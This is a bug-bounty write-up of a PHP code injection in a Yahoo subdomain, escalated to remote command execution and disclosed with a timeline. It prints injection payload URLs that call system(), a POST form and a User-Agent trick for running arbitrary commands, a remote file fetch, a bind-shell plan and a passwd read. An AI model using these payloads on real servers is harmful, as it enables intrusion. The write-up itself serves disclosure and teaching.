This is my first writeup for the blog, which I chose to be about the “Yahoo Remote Code Execution” vulnerability.
The case started with a “Remote PHP Code Injection” vulnerability that was later escalated to “Remote Command Execution”.
The server also hosted many other Yahoo! sub-domains!
What is “Remote PHP Code Injection”?
Simply put, PHP code injection occurs when user-supplied values (GET/POST parameters) are reflected inside an eval() call; that lets an attacker execute arbitrary PHP, such as system("id") or any other PHP function or code.
That said, I was able to inject PHP code by manipulating the value of the “sid” parameter.
In the beginning, I tried to list the directories and files with “dir” via the system() function:
Indeed, I needed a better view, so I tried system("ls -la"). But!?
It didn’t work! The URL does not accept any spaces!!
Actually, I needed a good proof of concept to explain to the Yahoo! Security Team how dangerous this vulnerability is, given the number of Yahoo! sub-domains hosted on the same server.
So I tried to bypass that issue with some tricks, including URL-encoding the space as %20, but it didn’t work. Same result with double URL encoding!
e.g. http://tw.user.mall.yahoo.com/rating/list?sid=[email protected](system("ls%20-la"))}
I also tried to get around it by using file_get_contents("http://sec-down.com/poc.txt"), but that didn’t work because of the folder permissions. Did you say do it in /tmp?!
I thought of:
1- Uploading “bind.sh”, a bind-connection script, into the /tmp directory
2- Executing it to open a bind connection to the server
e.g. http://tw.user.mall.yahoo.com/rating/list?sid=[email protected](system("./tmp/bind.sh"))}
3- Receiving the connection from the server in Netcat; now I would be free to run whatever commands I wanted
But actually, Netcat is a hacking tool! It could also be detected by any simple AV/IDS on the system, and this could ruin the whole thing!
I had to go for another solution.
Thanks to Ahmed Abul-Ela and Ibrahim Mosaad, I was able to execute commands using system($_POST['x2']):
<form method="POST" action="http://tw.user.mall.yahoo.com/rating/list?sid=[email protected](system($_POST['x2']))}">
<input type="text" name="x2">
<input type="submit">
</form>
Also by using system($_SERVER['HTTP_USER_AGENT']) and then injecting my commands into the User-Agent header.
e.g. http://tw.user.mall.yahoo.com/rating/list?sid=[email protected](system($_SERVER['HTTP_USER_AGENT']))}
Yes, I know there are other good tricks, such as readfile("/etc/passwd") and many more, but as you know, with all the adrenaline I had, those ideas never come to mind when you need them.
Sample PoC for the vulnerability [allowed by Yahoo! to be made public]:
Jan 20, 2014 at 6:39 PM – Initial report to the Yahoo! Security Team.
Jan 20, 2014 at 6:56 PM – Update 1 sent to Yahoo!: the server kernel was an old one with a well-known “Local Privilege Escalation” vulnerability, which means an attacker with such a vulnerability can gain ROOT ACCESS to the server!!!!
Jan 21, 2014 at 6:44 PM – Yahoo! acknowledged the vulnerability and pushed a fix for it.
Thanks to Yahoo! Security team for the fast fix release.
BTW, no news about the bounty yet!
Follow me: twitter.com/zigoo0